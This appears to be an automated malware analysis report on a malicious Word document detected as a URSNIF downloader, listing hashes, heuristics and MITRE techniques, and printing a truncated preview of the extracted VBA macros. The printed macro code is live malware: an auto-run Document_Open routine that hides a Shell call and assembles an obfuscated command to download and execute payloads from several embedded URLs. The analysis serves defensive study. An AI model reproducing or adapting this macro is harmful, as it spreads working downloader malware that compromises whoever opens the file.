Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bdff3032357737bb…

MALICIOUS

Office (OLE)

72.6 KB Created: 2018-09-11 13:03:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 59a542a2f0920d35429490a2baaf8c0d SHA-1: 73fe968d8ecd2f61b10005e8e2fd04b58a5086d0 SHA-256: bdff3032357737bb14b4503602c6cd36cc51da1dfde7af9e317adf92aef02496
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' further supports this, suggesting a downloader functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5705 bytes
SHA-256: 0caf1b00892c86c9d2e13cda7e6588fd62c47bb31ad5f6c8b6c16fc8e7e542d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vXNnnpAFE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "HnZ" + "fG"
   VarType "TYLH" + "413888414" + "VjwvOwISlTZ" + "RqaZ"
Shell rtmzwW + XkqkWfjl + QIkLcX, Format(vbHide)
   VarType "QhpUPunqTmGh" + "ToB"
   VarType "3477" + "2736"
   VarType "z" + "Jfk"
End Sub



Attribute VB_Name = "foRhoOVIKaMAM"
Function rtmzwW()

On _
Error _
Resume _
Next
VarType "T" + "Wik"
   VarType "2246" + "I" + "NtiJ" + "BVwuqoHqQdrAT"
   VarType "nzYUQsVzWzcVO" + "FOjoJF"
RbLsGFrLr = Format(Chr(1 + 7 + 3 + 9 + 79)) + "md /V" + "/" + Format(Chr(1 + 4 + 2 + 6 + 54)) + Format(Chr(0 + 2 + 1 + 2 + 29)) + "^s" + "^et " + "6^W^P=" + "^ ^   " + " " + "  ^ ^ " + "^  ^  " + "  ^  }}" + "^"
VarType "j" + "av"
   VarType "BNud" + "8935" + "srkUQOaNV" + "245135162"
   VarType "535719876" + "3251"
ONEoDzUqV = "{^h" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "ta" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "};" + "k^a" + "^erb" + ";" + "w^wz$" + "^ " + "me^t^" + "I"
VarType "4211" + "390409561" + "VKOK" + "KiYw"
XRVQAqcaKqc = "-" + "^ek^" + "ovnI^" + ";" + ")w^wz" + "$ " + ",^WPr$"
VarType "V" + "21829927" + "ZEf" + "HFAus"
   VarType "vFZzOz" + "uCHlijY"
ToFCjHwIi = "(e^l^i" + "F^d^a" + "^o^ln" + "^woD" + "^." + "^zL" + Format(Chr(1 + 4 + 2 + 6 + 54)) + "^$" + "^{"
VarType "bJwG" + "4151"
   VarType "391553800" + "HTujFNsbSUsP" + "1570" + "2923"
TLJELA = "^yrt{)p" + "Sl^$ n^" + "i^ W^" + "Pr" + "$(h" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "aer" + "o" + "f" + "^;^'^ex" + "^"
VarType "MYQSdTSij" + "fS"
   VarType "4385" + "S"
   VarType "4237" + "2124"
   VarType "EjMTHnZzqz" + "290865336"
pkaKBzq = "e^.'" + "+^z^Uw^" + "$+^" + "'^\^" + "'^+" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "i" + "l^" + "b^u^" + "p^:vn^e" + "$=w" + "^wz^$"
rtmzwW = RbLsGFrLr + ONEoDzUqV + XRVQAqcaKqc + ToFCjHwIi + TLJELA + pkaKBzq
   VarType "zQm" + "6769" + "f" + "bVP"
   VarType "1846" + "HuiIjYjq"
   VarType "E" + "PqE"
   VarType "514198750" + "EhTt" + "471979682" + "168022499"
End Function
Function XkqkWfjl()

On _
Error _
Resume _
Next
VarType "lvcijSUiwkXba" + "cXilHSPuRZS"
   VarType "vGw" + "kKO"
OmwXs = ";^'^6^5" + "^5^'" + " ^" + "=^ ^" + "zUw^$;" + ")'@'(" + "^" + "ti" + "^" + "l" + "pS."
VarType "oN" + "KbtjEmdD"
   VarType "4438" + "3057"
   VarType "7131" + "366189162" + "sN" + "279"
FfcZsLi = "^'^6" + Format(Chr(1 + 4 + 2 + 6 + 54)) + "t8" + "F^" + "W" + "^f^" + "M/^m" + "o" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "." + "r^eg" + "ni"
VarType "wJFEjHmU" + "9888" + "268482876" + "5897"
   VarType "dCMSEZcA" + "nR"
   VarType "6657" + "pqd" + "9390" + "5608532"
iJGkHnCWwf = "^l^m" + "i" + "^" + "t//" + ":^"
VarType "rNJ" + "453894351" + "150733913" + "JQU"
   VarType "2720" + "Bhwk" + "Jdt" + "JwdoHFs"
   VarType "VEjjLao" + "4601"
PHIGCnDRij = "p^" + "t^t" + "h@S^g^" + "zP^" + "bkK^m" + "/rb^" + ".m" + "o" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "^.s" + "arievi^" + "l^"
VarType "130354904" + "7558" + "kAfR" + "bPWEWoCRYfQilI"
   VarType "197850394" + "aMfN"
   VarType "alDADzXpDMAZP" + "2069"
IQsKBbGbGW = "o//" + ":p^t" + "th@Fx^" + "y" + "K^W" + "DL^" + "1" + "^3/ln.n" + "^worb^"
VarType "uFv" + "9890" + "249925569" + "KPbQtbrh"
   VarType "UbupJfollmhp" + "1738"
IVWZlommN = "e" + "v" + "^e^t^s/" + "/:" + "ptth" + "^@redUp" + "Q5^h/s" + "tat^s/" + "m" + "^o" + Format(Chr(1 + 7 + 3 + 9 + 79)) + ".e" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "^i^ps" + "^d^ub" + "^e^l" + Format(Chr(1 + 7 + 3 + 9 + 79)) + "n"
VarType "vwROQShfVS" + "199177120"
   VarType "dBzOaKJN" + "397505804" + "343884759" + "455666179"
   VarType "oOBNDh" + "322966149"
bQbaz = "u/" + "/" + "^:p" + "t^t^" + "h@GH^ku" + "hk^M/^" + "mo" + Format(Chr(1 + 7 + 3 + 9 + 79)) + ".a" + "mixam"
VarType "C" + "stzMlN" + "GbuC" + "405355211"
   VarType "iiz" + "l" + "bjXkrvrPSJ"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.